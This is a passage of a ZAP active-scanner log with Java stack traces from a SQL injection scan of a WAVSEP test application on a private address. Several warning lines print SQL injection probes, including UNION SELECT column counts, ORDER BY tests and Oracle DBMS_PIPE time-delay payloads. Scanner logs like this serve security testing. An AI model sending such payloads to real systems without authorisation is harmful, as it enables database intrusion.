org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680752 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 5446-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 5446-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680753 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680753 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5902=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(117)||CHR(75)||CHR(112),5) AND (6194=6194] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5902=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(117)||CHR(75)||CHR(112),5) AND (6194=6194 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680754 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680755 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1800=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(72)||CHR(69)||CHR(107),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1800=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(72)||CHR(69)||CHR(107),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680756 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680756 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8453=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(83)||CHR(73)||CHR(98),5) AND ('vBfG'='vBfG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8453=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(83)||CHR(73)||CHR(98),5) AND ('vBfG'='vBfG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680757 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680758 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680758 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2688=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(119)||CHR(114)||CHR(73),5) AND 'ZzTp'='ZzTp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2688=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(119)||CHR(114)||CHR(73),5) AND 'ZzTp'='ZzTp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680759 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680760 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1910=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(102)||CHR(110)||CHR(114),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1910=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(102)||CHR(110)||CHR(114),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680760 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 